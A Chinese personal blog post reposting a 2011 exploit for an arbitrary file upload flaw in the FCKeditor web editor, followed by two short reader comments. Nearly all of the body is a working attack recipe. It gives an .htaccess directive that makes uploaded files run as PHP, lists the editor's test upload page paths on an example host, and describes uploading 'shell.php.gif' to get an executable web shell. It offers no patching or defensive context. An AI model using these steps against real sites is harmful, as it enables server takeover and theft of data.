• 搜索
    • 夜间模式
    ©2026  岚峰 Theme by OneBlog

    岚峰博客

    搜索
    标签
    # 记事 # 维修 # plc # 学习 # 记录 # 文字 # 博客 # 小说 # 酒 # 闲话
  • 首页>
  • 杂乱无章>
  • 正文

    • FCKeditor全部版本上传漏洞

    2011年08月31日 489 阅读 2 评论 659 字

    记录下也许哪天还找这个呢!
    FCKeditor all versian Arbitrary File Upload Vulnerability
    发布时间: 2011
    源码地址:http://sourceforge.net/projects/fckeditor/
    漏洞作者: pentesters.ir
    利用步骤:
    1.创建一个htaccess文件:
    代码内容:

    SetHandler application/x-httpd-php

    2.实用编辑器上传htaccess文件.
    http://www.badguest.cn/FCKeditor/editor/filemanager/upload/test.html
    http://www.badguest.cn/FCKeditor/editor/filemanager/browser/default/connectors/test.html
    3.上传shell.php.gif
    4.上传后shell.php.gif, 会自动被改名为 shell_php.gif
    5.访问http://www.badguest.cn/上传目录/shell_php.gif

    本文著作权归作者 [ 岚峰 ] 享有,未经作者书面授权,禁止转载,封面图片来源于 [ 互联网 ] ,本文仅供个人学习、研究和欣赏使用。如有异议,请联系博主及时处理。
    漏洞
    取消回复

    发表留言
    回复

    读者留言2

    1. 翱翔宇宙 Lv.3
      2011-08-31 13:08 回复

      不懂诶。 :|

      1. admin 博主
        2011-08-31 13:24 回复
        @翱翔宇宙

        利用伪静态。

    加载更多评论
    加载中...
    — 已加载全部评论 —
    Copyright©2026  All Rights Reserved.  Load:0.012 s
    Theme by OneBlog V3.6.5
    夜间模式

    开源不易,请尊重作者版权,保留基本的版权信息。